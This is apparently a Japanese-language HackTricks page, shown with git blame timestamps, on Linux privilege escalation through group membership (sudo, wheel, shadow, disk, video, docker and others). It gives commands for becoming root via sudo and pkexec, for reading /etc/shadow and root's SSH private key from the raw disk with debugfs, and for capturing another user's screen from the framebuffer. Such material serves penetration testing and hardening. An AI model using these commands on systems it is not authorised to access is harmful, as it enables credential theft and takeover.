hacktricks/linux-unix/privilege-escalation/interesting-groups-linux-pe.md

171 lines
10 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝したいですか** または、**PEASSの最新バージョンにアクセスしたいですか** または、**HackTricksをPDFでダウンロードしたいですか** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
2022-04-28 16:01:33 +00:00
</details>
2023-07-07 23:42:27 +00:00
# Sudo/Admin グループ
2023-07-07 23:42:27 +00:00
## **PE - 方法1**
2023-07-07 23:42:27 +00:00
**時には**、**デフォルトで(または一部のソフトウェアが必要とするために)** **/etc/sudoers** ファイルの中に、次のような行があることがあります:
```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```
2023-07-07 23:42:27 +00:00
これは、**sudoまたはadminグループに所属するユーザーはsudoとして何でも実行できる**ことを意味します。
2023-07-07 23:42:27 +00:00
もし状況がそうであるなら、**rootになるためには単に以下を実行するだけです**:
```text
sudo su
```
2023-07-07 23:42:27 +00:00
## PE - メソッド2
2023-07-07 23:42:27 +00:00
すべてのsuidバイナリを見つけ、バイナリ**Pkexec**があるかどうかを確認します:
```bash
find / -perm -4000 2>/dev/null
```
2023-07-07 23:42:27 +00:00
もし、バイナリファイルpkexecがSUIDバイナリであり、sudoまたはadminに所属している場合、おそらくpkexecを使用してバイナリをsudoとして実行できるでしょう。
以下の内容を確認してください:
```bash
cat /etc/polkit-1/localauthority.conf.d/*
```
2023-07-07 23:42:27 +00:00
以下では、どのグループが**pkexec**を実行することが許可されているか、および一部のLinuxではデフォルトで**sudo**または**admin**のいずれかのグループが表示されることがあります。
2023-07-07 23:42:27 +00:00
**rootになるためには、次のコマンドを実行します**:
```bash
pkexec "/bin/sh" #You will be prompted for your user password
```
2023-07-07 23:42:27 +00:00
もし**pkexec**を実行しようとして、以下の**エラー**が表示された場合:
```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```
2023-07-07 23:42:27 +00:00
**権限がないわけではなく、GUIなしで接続されていないためです**。この問題の回避策はこちらにあります:[https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)。**2つの異なるsshセッション**が必要です:
{% code title="session1" %}
```bash
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
```
{% code title="session2" %}
```bash
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
```
{% endcode %}
2023-07-07 23:42:27 +00:00
# Wheelグループ
2023-07-07 23:42:27 +00:00
**時々**、**デフォルトで**、**/etc/sudoers**ファイルの中にこの行が見つかることがあります:
```text
%wheel ALL=(ALL:ALL) ALL
```
2023-07-07 23:42:27 +00:00
これは、**wheelグループに所属するユーザーはsudoとして何でも実行できる**ことを意味します。
2023-07-07 23:42:27 +00:00
もし上記が当てはまる場合、**rootになるためには単に以下を実行するだけです**:
```text
sudo su
```
2023-07-07 23:42:27 +00:00
# シャドウグループ
2023-07-07 23:42:27 +00:00
**シャドウグループ**のユーザーは、**/etc/shadow** ファイルを**読み取る**ことができます。
```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```
2023-07-07 23:42:27 +00:00
# ディスクグループ
2023-07-07 23:42:27 +00:00
この特権は、マシン内のすべてのデータにアクセスできるため、ほぼルートアクセスと同等です。
2023-07-07 23:42:27 +00:00
ファイル:`/dev/sd[a-z][1-9]`
```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```
2023-07-07 23:42:27 +00:00
注意してください、debugfsを使用すると**ファイルを書き込む**こともできます。例えば、`/tmp/asd1.txt`を`/tmp/asd2.txt`にコピーするには、次のようにします:
```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```
2023-07-07 23:42:27 +00:00
しかし、rootが所有するファイル`/etc/shadow`や`/etc/passwd`など)を書き込もうとすると、「**Permission denied**」のエラーが発生します。
2022-05-01 12:41:36 +00:00
# Video Group
2023-07-07 23:42:27 +00:00
コマンド`w`を使用すると、**システムにログインしているユーザー**を見つけることができ、以下のような出力が表示されます:
```bash
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
```
2023-07-07 23:42:27 +00:00
**tty1**は、ユーザー**yossiが物理的に**マシンの端末にログインしていることを意味します。
2023-07-07 23:42:27 +00:00
**videoグループ**は、画面出力を表示する権限を持っています。基本的に、画面を観察することができます。これを行うには、現在の画面のイメージを生データで取得し、画面が使用している解像度を取得する必要があります。画面データは`/dev/fb0`に保存され、この画面の解像度は`/sys/class/graphics/fb0/virtual_size`で見つけることができます。
```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```
2023-07-07 23:42:27 +00:00
**生のイメージ**を**開く**には、**GIMP**を使用し、**`screen.raw`**ファイルを選択し、ファイルタイプとして**生のイメージデータ**を選択します:
![](../../.gitbook/assets/image%20%28208%29.png)
2023-07-07 23:42:27 +00:00
次に、画面で使用されている幅と高さを変更し、さまざまなイメージタイプを確認します(画面をより良く表示するものを選択します):
![](../../.gitbook/assets/image%20%28295%29.png)
2023-07-07 23:42:27 +00:00
# ルートグループ
2023-07-07 23:42:27 +00:00
デフォルトでは、**ルートグループのメンバー**は、特権をエスカレートするために使用できる**一部のサービス**の設定ファイルや**ライブラリ**ファイルなど、**他の興味深いもの**を変更することができるようです...
2023-07-07 23:42:27 +00:00
**ルートメンバーが変更できるファイルを確認します**
```bash
find / -group root -perm -g=w 2>/dev/null
```
2023-07-07 23:42:27 +00:00
# Dockerグループ
2023-07-07 23:42:27 +00:00
ホストマシンのルートファイルシステムをインスタンスのボリュームにマウントすることができます。そのため、インスタンスが起動するとすぐにそのボリュームに`chroot`がロードされます。これにより、実質的にマシン上でroot権限を取得することができます。
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
2023-07-07 23:42:27 +00:00
# lxc/lxdグループ
2023-07-07 23:42:27 +00:00
[lxc - 特権エスカレーション](lxd-privilege-escalation.md)
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**または**Telegramグループ**に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
2022-04-28 16:01:33 +00:00
</details>